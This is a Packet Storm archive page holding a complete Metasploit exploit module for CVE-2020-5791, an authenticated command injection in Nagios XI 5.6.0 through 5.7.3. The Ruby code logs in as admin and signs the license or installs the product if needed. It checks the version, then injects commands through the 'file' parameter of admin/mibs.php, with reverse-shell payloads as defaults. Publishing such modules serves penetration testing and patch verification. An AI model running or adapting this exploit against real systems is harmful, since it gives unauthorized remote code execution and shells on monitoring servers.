what you don't know can hurt you

Nagios XI 5.7.3 Remote Code Execution

Nagios XI 5.7.3 Remote Code Execution
Posted Apr 19, 2021
Authored by Chris Lyne, Matthew Aberegg, Erik Wynter | Site metasploit.com

This Metasploit module exploits CVE-2020-5791, an OS command injection vulnerability on Nagios XI versions 5.6.0 through 5.7.3 in admin/mibs.php that enables an authenticated user with admin privileges to achieve remote code execution as either the apache user or the www-data user.

tags | exploit, remote, php, code execution
advisories | CVE-2020-5791
MD5 | 639bef5044c0f11d63a9c893409809f3

Nagios XI 5.7.3 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::NagiosXi
include Msf::Exploit::CmdStager
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI 5.6.0-5.7.3 - Mibs.php Authenticated Remote Code Exection',
'Description' => %q{
This module exploits CVE-2020-5791, an OS command injection vulnerability in
`admin/mibs.php` that enables an authenticated user with admin privileges to achieve
remote code execution as either the `apache` user or the `www-data` user on NagiosXI
version 5.6.0 to 5.7.3 inclusive (exact user depends on the version of NagiosXI
installed as well as the OS its installed on).

Valid credentials for a Nagios XI admin user are required. This module has
been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Lyne', # discovery
'Matthew Aberegg', # PoC
'Erik Wynter' # @wyntererik - Metasploit
],
'References' =>
[
['CVE', '2020-5791'],
['EDB', '48959']
],
'Platform' => %w[linux unix],
'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
'Targets' =>
[
[
'Linux (x86/x64)', {
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Platform' => 'linux',
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
}
],
[
'CMD', {
'Arch' => [ ARCH_CMD ],
'Platform' => 'unix',
# the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
}
]
],
'Privileged' => false,
'DisclosureDate' => '2020-10-20',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)

register_options [
OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
]
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def finish_install
datastore['FINISH_INSTALL']
end

def check
# Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
# an array containing the http response body of a get request to index.php and the session cookies
login_result, res_array = nagios_xi_login(username, password, finish_install)
case login_result
when 1..3 # An error occurred
return CheckCode::Unknown(res_array[0])
when 4 # Nagios XI is not fully installed
install_result = install_nagios_xi(password)
if install_result
return CheckCode::Unknown(install_result[1])
end

login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..3 # An error occurred
return CheckCode::Unknown(res_array[0])
when 4 # Nagios XI is still not fully installed
return CheckCode::Detected('Failed to install Nagios XI on the target.')
end
end

# when 5 is excluded from the case statement above to prevent having to use this code block twice.
# Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
if login_result == 5 # the Nagios XI license agreement has not been signed
auth_cookies, nsp = res_array
sign_license_result = sign_license_agreement(auth_cookies, nsp)
if sign_license_result
return CheckCode::Unknown(sign_license_result[1])
end

login_result, res_array = login_after_install_or_license(username, password, finish_install)
case login_result
when 1..3
return CheckCode::Unknown(res_array[0])
when 5 # the Nagios XI license agreement still has not been signed
return CheckCode::Detected('Failed to sign the license agreement.')
end
end

print_good('Successfully authenticated to Nagios XI')

# Obtain the Nagios XI version
@auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already

nagios_version = nagios_xi_version(res_array[0])
if nagios_version.nil?
return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
end

print_status("Target is Nagios XI with version #{nagios_version}")

if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
end

# check if the target is actually vulnerable
version = Rex::Version.new(nagios_version)
if version >= Rex::Version.new('5.6.0') && version <= Rex::Version.new('5.7.3')
return CheckCode::Appears
end

return CheckCode::Safe
end

def execute_command(cmd, _opts = {})
# execute payload
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin', 'mibs.php'),
'cookie' => @auth_cookies,
'vars_get' =>
{
'mode' => 'undo-processing',
'type' => '2',
'file' => ";#{cmd};"
}
}, 0) # don't wait for a response from the target, otherwise the module will in most cases hang for a few seconds after executing the payload
end

def exploit
if target.arch.first == ARCH_CMD
print_status('Executing the payload')
execute_command(payload.encoded)
else
execute_cmdstager(background: true)
end
end
end
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close